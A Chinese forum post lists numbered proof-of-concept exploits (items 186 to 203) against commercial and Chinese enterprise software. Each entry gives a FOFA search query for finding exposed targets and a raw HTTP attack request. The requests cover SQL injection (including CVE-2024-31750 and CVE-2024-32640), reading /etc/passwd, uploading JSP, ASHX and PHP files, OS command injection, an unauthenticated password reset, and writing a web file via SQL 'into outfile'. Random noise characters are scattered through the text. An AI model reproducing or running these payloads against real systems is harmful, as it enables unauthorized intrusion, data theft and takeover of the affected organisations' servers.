# o! }) \+ m& sGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.11 y( ~2 Z7 w0 s7 ~ q# Q0 b
Host: host: l& i6 t( t4 S3 v, F
8 L- S& X, j1 p. N
6 b2 |. e- B) e0 E186. F-logic DataCube3 SQL注入9 T8 d8 ?- c0 W+ X8 l' q' [# z
CVE-2024-31750
% t& C2 k8 e$ [F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
. K& G5 K" I2 g J8 EFOFA:title=="DataCube3"
, i5 G1 b2 S* U0 E% lPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
3 r1 h ~$ n" ` Z0 LHost: your-ip
2 y4 w; I2 a: i( ?) VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
7 s1 U2 b2 I. x' t) t. mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
5 t( d; U2 c8 k6 l0 o* i3 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% Y5 l$ s$ m. bAccept-Encoding: gzip, deflate
) c) g/ x7 i, {! j, h6 MConnection: close
: l0 t: U7 H7 ]3 [0 `Content-Type: application/x-www-form-urlencoded( ^& H$ g, H4 \3 f: G- ?
' r9 G* I7 b. ]+ u# T
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
. P9 s: A2 [. L L! h' N+ U; M, u& V1 N/ H0 o& J9 _
& @6 s' r9 U+ v+ V# U" E+ M6 X187. Mura CMS processAsyncObject SQL注入- V \9 {' _7 K2 z% v; G
CVE-2024-32640
+ ^0 p: E7 b4 _/ c7 s3 t9 |. ?FOFA:"Mura CMS", f" J, ]7 z% [7 a, {; X
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ D. V" M* \. B2 @, A% PHost: your-ip
& v4 z# c/ b6 L; t; IContent-Type: application/x-www-form-urlencoded
1 G, S- _% z2 `, s, ]- [3 L7 @) {& @/ Z2 t6 l- w8 W- `
' L7 u0 q* X" qobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1; ^3 r7 {, w J% D; g1 I
$ C8 M- q* o- F6 Q: C: x9 l
8 P6 q/ o" b8 Q4 y" g188. 叁体-佳会视频会议 attachment 任意文件读取
/ _- F. R" H9 q: l) y2 I4 E7 E& gversion <= 3.9.7
1 g. L( o! p6 ?1 ~' lFOFA:body="/system/get_rtc_user_defined_info?site_id"
0 q8 q* `6 ?! l2 x' I) r, GGET /attachment?file=/etc/passwd HTTP/1.15 b4 p8 J4 v9 z1 N" i' e+ A5 x
Host: your-ip
6 v# }* O- M IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( @! J1 W+ L; z' W; }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, ]5 `7 [. t( ^Accept-Encoding: gzip, deflate$ X' L7 J5 Q4 e! {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ R% q% \) ^4 d% l
Connection: close
" t# Y8 W% ~( b7 p% y* o- p! a$ s. ~8 T
; F. m; V6 B0 a7 h( X189. 蓝网科技临床浏览系统 deleteStudy SQL注入. f/ w* M& L2 r [( y+ _' H: K; t
FOFA:app="LANWON-临床浏览系统"
( m2 J ~! p- HGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
+ J/ e( }6 l }6 CHost: your-ip" ]8 L+ }( Z& _& b. h! [' p2 n( P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 R- y5 B6 |9 q- W: k- Z5 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( o z& Y0 f5 O/ x5 Y' HAccept-Encoding: gzip, deflate
, Z5 n0 M+ c9 `1 G0 F$ D0 VAccept-Language: zh-CN,zh;q=0.9. S2 R" _* e* u, b1 c
Connection: close7 x2 r8 L' s7 v% [& y }
9 b( T+ O; o+ U4 T
: @6 u/ S) b+ J& ^1 n j
190. 短视频矩阵营销系统 poihuoqu 任意文件读取( N8 t$ ?0 @) v; q: o
FOFA:title=="短视频矩阵营销系统"
( R* d' c$ {2 @, V+ D6 @POST /index.php/admin/Userinfo/poihuoqu HTTP/26 ~ R0 f' Y. N$ i$ t$ t9 o4 A" {
Host: your-ip5 d) r* M/ x6 O# I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36; u: p7 B- H! ~( A& L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" o( j$ b' |; ?4 B- w* z6 a2 p8 t# F9 c
Content-Type: application/x-www-form-urlencoded
* b. R' O' D0 \6 y- UAccept-Encoding: gzip, deflate
1 g" A# A8 P3 W. o0 r) p8 LAccept-Language: zh-CN,zh;q=0.94 {5 ]& z1 g, T9 w! B
. C9 m e5 U0 h& q! r" Q- p
poi=file:///etc/passwd$ r" f4 O$ n! P# v
6 ^7 x4 j* \ e. ?1 e( w- U8 ]
$ {; D- D5 s! \: s: J: i7 c191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入0 v/ Q- q3 C5 @# ~
FOFA:body="/CDGServer3/index.jsp"$ L2 {; ]$ l/ E& i T/ c/ w
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
- ~" Q) b- p! c, p8 ?/ l' ?6 kHost: your-ip
) e+ b# u$ c& b7 f) q N3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' f7 ^, G; ?" v8 ]Content-Type: application/x-www-form-urlencoded/ T; w3 ]# v0 T# b* ~: o
( W) Q5 G1 F* I; o8 X
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=, p% f! B3 M0 _4 D2 ]3 Y/ d
# K) h- R' A$ M/ R( |; P9 k
! F' L6 G6 H: B! w' [192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( t/ K$ m- K$ Y1 n; L h5 X& u: l8 N' fFOFA:title="用户登录_富通天下外贸ERP"2 ]" G( `4 [# @: T$ b
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
6 `$ Z. u& x/ v/ ?Host: your-ip# Y+ I- a; J; w' [! A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ O6 `, q, e- Q- f: }$ v
Content-Type: application/x-www-form-urlencoded
9 n( ^2 P5 Q* [# C# V# K9 ?9 |; h; E% N9 N3 j6 W
! ~. ?2 e' `2 E8 }" W) P* \<% @ webhandler language="C#" class="AverageHandler" %>
* h6 O! a7 p S3 n6 \/ Fusing System;
/ P8 H7 F9 N; F% b' Z% N \using System.Web;1 b5 A& K$ L m9 w" A
public class AverageHandler : IHttpHandler
3 |3 [) @4 U/ ]* w$ t; v1 A{
0 c4 k8 Z# {$ c& ^' a: Fpublic bool IsReusable. _9 G; n. `; }$ Y# \4 O
{ get { return true; } }
$ @$ y2 W% {! epublic void ProcessRequest(HttpContext ctx)
9 p1 @) o/ @3 `" {) v{) z i& _7 P# H F
ctx.Response.Write("test");
/ L- W. B% N0 ]9 m# \4 z0 ?}
+ I+ w- w7 k* G) O* }' F}% V; x/ T. z) R/ }
7 G1 I* o' M+ }# g$ T
# P& W1 H: q$ H1 x6 }5 h" |9 n193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行/ p4 s6 a- z) \+ @2 N/ Y
FOFA:body="山石云鉴主机安全管理系统"* q# a( h( H+ Y
GET /master/ajaxActions/getTokenAction.php HTTP/1.1, K1 K0 g( @: m' _
Host:! Y3 S- c/ Q/ V4 g! v, C" V
Cookie: PHPSESSID=2333333333333;
/ B5 _) d0 m5 h$ |$ z! EContent-Type: application/x-www-form-urlencoded
" l3 F1 P4 H, p7 b0 GUser-Agent: Mozilla/5.0
% F% Y1 M8 u' f& i
4 H- o) Y9 s* M/ h, t( Z
7 \2 T7 m/ Y" J7 v0 [ zPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.11 m X% G* s2 ^
Host:
+ {8 {: Y; o/ l, O3 LUser-Agent: Mozilla/5.0+ J$ x: N2 L3 P0 `: A# C
Accept-Encoding: gzip, deflate2 H5 p- Q: W/ H! G6 }$ y8 Q& d& w
Accept: */*7 I$ c! h7 P0 B+ p! {
Connection: close
( a+ _+ V- J! I" V6 m6 gCookie: PHPSESSID=2333333333333;* G0 q$ {; z3 z* j* b
Content-Type: application/x-www-form-urlencoded- q6 e3 d7 ^8 Q& J' ?
Content-Length: 842 \: O) r0 w1 Y# ]" W7 w" p
. s# d8 |# C1 S* t
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')6 `; } {5 d6 j3 R7 J
8 N8 |( b: d) ]! o! S
4 D2 n' v3 E! H) r6 M G4 oGET /master/img/config HTTP/1.1. @' B8 }; B1 ]
Host:7 Y2 T: s7 r A/ {
User-Agent: Mozilla/5.0, s% Z' X3 {, m9 p u: ~+ c
$ ~* ?9 H0 e2 A7 R I
; Y$ O0 V- j _6 \$ Q) F$ _% x8 U194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传" H; r4 n* j- \' j8 y* k
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
; b" R/ e. _7 l, C" D: B8 N/ [2 O j+ k2 Q5 v
POST /servlet/uploadAttachmentServlet HTTP/1.1
/ K/ u0 A8 {6 I1 K" w6 rHost: host. G2 t0 C7 R; }2 W' E+ @* N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.361 s% f- ~9 V# ?9 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* N6 ?* U5 i* P% E; G0 I' o. QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- }. N' v' f1 [* MAccept-Encoding: gzip, deflate4 I" j6 S( k0 H0 E# X
Connection: close9 L" i8 x7 k }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
) P0 J- n' g5 U1 f------WebKitFormBoundaryKNt0t4vBe8cX9rZk$ E* d" t& D% x- N5 j
. U# M3 d& J4 |
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
6 ^& h1 O( y* h, Q, [Content-Type: text/plain4 m3 ?$ M8 M6 s; T& q0 ~' ~' M
<% out.println("hello");%>
0 S5 R0 y' y6 E7 K& L+ N2 r8 t# I' f& A------WebKitFormBoundaryKNt0t4vBe8cX9rZk
3 M2 V- o: q% A% dContent-Disposition: form-data; name="json"
4 T7 F3 a& B5 r+ L0 R3 _: e {"iq":{"query":{"UpdateType":"mail"}}}
8 A: b7 `# p1 Q; T------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
1 v% E" x+ J5 n6 E. k4 `6 g" J4 e# F
: p$ O2 Q5 _$ P
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 m5 S3 w9 ` b+ B9 T1 [FOFA:title=="飞鱼星企业级智能上网行为管理系统/ W& Z9 L$ Y: B v! P
POST /send_order.cgi?parameter=operation HTTP/1.12 r; p: i9 R4 d: l' {
Host: 127.0.0.1* C+ ?1 I! t4 j$ s% z
Pragma: no-cache
) Q$ h `$ P9 u \6 m" LCache-Control: no-cache
' `" C* a# D: ]- z$ e1 w" OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ s/ ^6 P% c6 Z! ?Accept: */*
; A) M+ S9 |) R' S' n; MAccept-Encoding: gzip, deflate$ W% P6 X$ f8 s$ F; {4 j
Accept-Language: zh-CN,zh;q=0.9, Q6 h& d+ ~! J% V' L
Connection: close! _, t9 a+ m0 G6 F
Content-Type: application/x-www-form-urlencoded, A# t- g9 {5 I! x# _: N
Content-Length: 68
/ O3 \: D6 U5 s
( h+ g4 p M0 a! P% N{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}" H7 B! Q1 E; p+ N o% y& y
$ m W, o8 W5 u d4 _
: t7 K/ \1 z" H8 h: R$ H
196. 河南省风速科技统一认证平台密码重置; S! J0 A% p1 C% L
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"0 W! z! R& v; m0 o8 [4 N$ Q
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
3 q1 E* A8 i8 d; l( b: kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; L4 h3 g/ o7 R" P8 l- r* qContent-Type: application/json;charset=UTF-8- B9 `) \; ~! N$ R' ]6 _
X-Requested-With: XMLHttpRequest
6 T: ~, Q$ C' v% z! P: BHost:
7 @# ~5 V2 f" i. lAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
0 q& l) _3 U. u& q( EContent-Length: 45
a$ M- z, ~* O, R) r. u9 WConnection: close) g' X5 m( A7 H6 _# u( E
# R" {0 }8 ]' E6 M7 u9 j
{"xgh":"test","newPass":"test666","email":""}
) V. ]2 L2 l' s' T% x/ w
0 b. k: |. u* K8 N) g; C5 ~( @- ?& B T; e) ?3 X. [# u+ L) R
9 U( `$ f% p6 Z" |' g8 S9 u197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入8 F5 ]. P# i7 g/ g& s. d
FOFA:app="浙大恩特客户资源管理系统"
6 @4 m/ N; k0 o0 fGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.14 y+ ?( Z% N2 S: s- @
Host:+ l- ?) u0 P# [: S& {; @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
0 B$ c( }, H( V% PAccept-Encoding: gzip, deflate
& ]" _# [0 W8 @+ N7 s; oConnection: close" s# {$ j+ o' [. @8 `
" M; d$ K" p- M) r, G. e
4 l& h/ s( _, \+ U6 {) H+ ~
H7 h, O1 r3 b' [
198. 阿里云盘 WebDAV 命令注入 \# e( l: K; U6 q4 z. T
CVE-2024-29640
6 s- C8 e& {9 R6 m1 Q1 a FGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
8 B( V1 V5 U, U4 ^/ P+ BCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
+ L* g& d S' Z6 {Accept: */*1 q/ `! E! g- Z# J: o: T" F
Accept-Encoding: gzip, deflate
* W x7 G. s. F" k6 \; ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6. |* B' E g9 f' U( K0 t+ Z
Connection: close5 p% j/ _% W6 E% ~5 Z, ]4 v
, i' w9 }3 j7 q2 b, m
! h* O) o0 ^2 q+ o8 o& Y* B
199. cockpit系统assetsmanager_upload接口 文件上传
. Y5 K8 D' r2 M( H D
" A+ l4 p$ n8 N5 k1 z1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果: Z. C( P ~% [: X. v9 w( A4 q
GET /auth/login?to=/ HTTP/1.1% E* `8 u) q8 x8 m8 I" l
% n1 q) p, Y5 h. p响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"- @' [' f5 U/ Q* S
+ I J5 V3 j1 m$ ]7 n2.使用刚才上一步获取到的jwt获取cookie:
7 ` V! h+ @, ~, R. o' f7 S0 z Z7 s4 u% m' q1 t6 q& O9 [1 z
POST /auth/check HTTP/1.1+ ~2 ~3 ^2 L( Y- B9 m, ^( c
Content-Type: application/json* B$ _- x" _/ K3 w/ W5 z
% V! x0 a! B& F o7 k{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}( `) J. O. I9 B. c
* H* l3 L1 s' x0 W+ U$ p, J响应:200,返回值:
3 B, }2 `* B* [/ c0 [Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/% Q3 x2 Z7 c# C+ ^
Fofa:title="Authenticate Please!", y, R4 Q0 }5 [# L+ h% h+ x; q
POST /assetsmanager/upload HTTP/1.1
! B% j, T' A7 B( KContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3# [7 C: D! w1 B. s* d- p" K
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; Q5 v. n/ g3 o7 u# I
% Y1 n5 s3 U$ Q* |-----------------------------36D28FBc36bd6feE7Fb3/ G f( j R! h" ]
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
/ ]' P, X$ ?( Y }# E9 I! ~* u4 Q4 N9 pContent-Type: text/php
) e- x7 m$ g" X x" B
3 Q1 x$ P, K3 C& u<?php echo "tttt";unlink(__FILE__);?>3 C0 l5 U& A# \
-----------------------------36D28FBc36bd6feE7Fb35 {, g8 p2 N) o: k/ D! R
Content-Disposition: form-data; name="folder"
! s% j# U# X- @% ^
- g4 _0 {; }% J; Y3 W0 i+ H5 q1 } r4 w-----------------------------36D28FBc36bd6feE7Fb3--( }& E2 g, ~2 v0 W! N
! p3 W/ s: e, u. F2 t% Q) q2 i/ O, V: s2 f
/storage/uploads/tttt.php; K9 B. n% P0 F3 G6 c, F0 V
3 f- B5 @1 g& F6 y t. Z200. SeaCMS海洋影视管理系统dmku SQL注入/ H4 h; Z6 R# v" \3 v
FOFA:app="海洋CMS", V( ?. \! u2 [! B
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.11 C9 j7 h+ G1 ?3 M. y5 y
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
: @& P. _) `( \( O, u! \; O. ?+ b xUpgrade-Insecure-Requests: 1# w: o$ T6 \0 r2 V+ @9 Q3 }
Cache-Control: max-age=0
k/ S. P+ B. l3 F: L$ G7 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! u( i+ w1 |3 v W* `% I1 rAccept-Encoding: gzip, deflate5 S6 O, ^! G! o0 A+ b
Accept-Language: zh-CN,zh;q=0.9: o. ~: c( {, I( u# v
! H+ [: W, `& k* S7 `
, l; R: F# U0 M3 P201. 方正全媒体新闻采编系统 binary SQL注入5 y2 M% t- w6 ~; Q7 X
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% ]- O+ _" |3 J5 v# XPOST /newsedit/newsplan/task/binary.do HTTP/1.1
6 u1 r5 b$ V( I2 y: K9 S" y m; \Content-Type: application/x-www-form-urlencoded
! U4 L/ Y7 x9 _( k6 ]6 v9 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
t' i& [$ t# Q/ Y3 bAccept-Encoding: gzip, deflate& p6 |- z' M5 \% x+ {" @. g3 }
Accept-Language: zh-CN,zh;q=0.9* P9 p6 l4 u) g" c8 s( P
Connection: close8 U1 d6 L7 L$ R1 u
8 v4 |8 @) M/ U& q6 _" B; s6 Q1 mTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
7 L1 y0 o3 \$ p: Y! Z( |5 A4 B8 z# S7 M" m. {; |( t5 |% V
* M0 Y+ ]4 g) c) x# g# a
202. 微擎系统 AccountEdit任意文件上传
2 I7 o: a% t9 U/ K" K5 v2 yFOFA:body="/Widgets/WidgetCollection/"
/ U* j! U( {8 c! R# z. U6 Y获取__VIEWSTATE和__EVENTVALIDATION值
3 D* r, o, X# a \0 pGET /User/AccountEdit.aspx HTTP/1.1- O' r3 ~6 e5 r( f$ h+ @) Z- z
Host: 滑板人之家
) a7 N" ^2 u/ j' `5 o7 C$ f' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
3 _# G3 A& a7 h9 ?7 }# lContent-Length: 0+ r H$ L% d2 |: Y, [$ e( Z' g
3 `" s# s* z; v) S4 b& c- J
$ J/ s8 B* R! y6 {, [替换__VIEWSTATE和__EVENTVALIDATION值0 W4 d$ w5 ?. ?
POST /User/AccountEdit.aspx HTTP/1.1- P( U4 ~$ x) v! r& n: E7 E: U
Accept-Encoding: gzip, deflate, br$ X$ [1 y1 f; X2 g7 d
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
0 {, x' r* \0 ~3 z! T0 m" g% ]" l' y% @6 M! _2 k
-----------------------------786435874t38587593865736587346567358735687 k! @% D( B+ [7 k( `4 T
Content-Disposition: form-data; name="__VIEWSTATE"' Z1 T) ]2 M, P4 g! i
7 M2 j6 S; T( _& ___VIEWSTATE" ^/ o* m. K( q0 `# `. R
-----------------------------786435874t385875938657365873465673587356877 f( u1 }0 V; x! F, ~1 H" T
Content-Disposition: form-data; name="__EVENTVALIDATION"6 R/ @+ c# D7 ^, J; ]' O; h7 b! r0 v' I
& ^* V* b) n7 S$ J__EVENTVALIDATION9 m& S1 e) M/ K4 e
-----------------------------786435874t38587593865736587346567358735687
7 o) Z9 ~/ ?' rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt", \+ |; _$ r3 d- e% H$ l! L, ]
Content-Type: text/plain3 W g+ W3 T. Z4 ^" x. E
5 u0 O! Y* v5 U" v9 [: iHello World!
v) u: h8 C- F: _-----------------------------786435874t38587593865736587346567358735687
# \' X4 h" C! N; y$ a/ |1 kContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
# C* Y+ ^1 P: }
! [4 S* T8 Q0 [/ e- Q上传图片
3 ?) n6 _# o! Z1 \' ~-----------------------------786435874t38587593865736587346567358735687
9 P" C, `" Q4 ?6 l: q9 PContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"7 t" m6 [' I/ D4 }3 \
, Q, ^; d9 m8 K% r$ U- ~7 f
8 j8 F% C5 L) r ~/ G6 l6 P& d" e-----------------------------786435874t38587593865736587346567358735687
; J; E. Y/ T. B) QContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
6 ]3 q5 j6 K7 G7 J
: d5 K" ^& b' O; ~7 R9 t! [
$ [% I8 W% }! B2 X l! V1 _-----------------------------786435874t38587593865736587346567358735687--
# q* I; B0 _# V( _% X* @+ k
- X" J- n9 y5 A6 g
5 a$ G, t5 v7 J# Q7 a ]/_data/Uploads/1123.txt) Z% Q: }4 u, i8 g- u
8 Z+ `* m7 U" T- B203. 红海云EHR PtFjk 文件上传7 c- Z, L6 s! i7 J& S5 ]8 J
FOFA:body="RedseaPlatform"
- M8 i6 i+ c9 n+ vPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1: M4 M: K$ u9 d( G7 \# ?/ O
Host: x.x.x.x
$ C4 T. p; b7 o9 eAccept-Encoding: gzip
- |7 y! {% U( A; Q& g( d& VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! q9 E# x: I# b( {2 d2 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
7 Z" F9 X3 b- A' L3 ^4 n% PContent-Length: 210
, ], N! c+ a/ I6 x5 O3 I& r9 d9 ?) d+ E2 m
------WebKitFormBoundaryt7WbDl1tXogoZys4$ P* U# E* N( _! T7 K6 p
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
) _# Y, Q, A+ a3 i+ ]Content-Type:image/jpeg) A4 ^' N* X! c. P- M/ H6 G
3 k+ g9 C9 Z6 n* {% d
<% out.print("hello,eHR");%>
1 t* K2 u f9 I/ Y" V" K' r' [. e+ }------WebKitFormBoundaryt7WbDl1tXogoZys4--+ K4 y( b; T% E) l. `
8 Y( n& _5 b* G9 M
5 E1 u1 |% r1 k8 ]- ~) N3 u
% q% v& K! `* P7 h4 I4 }1 n
- T' L" c+ D9 F) u( [& \& N" V6 ^% n8 G# b
! k& l, I$ A$ ]8 q! }& i
|
发表于 2024-6-5 14:31:29
收藏
支持
反对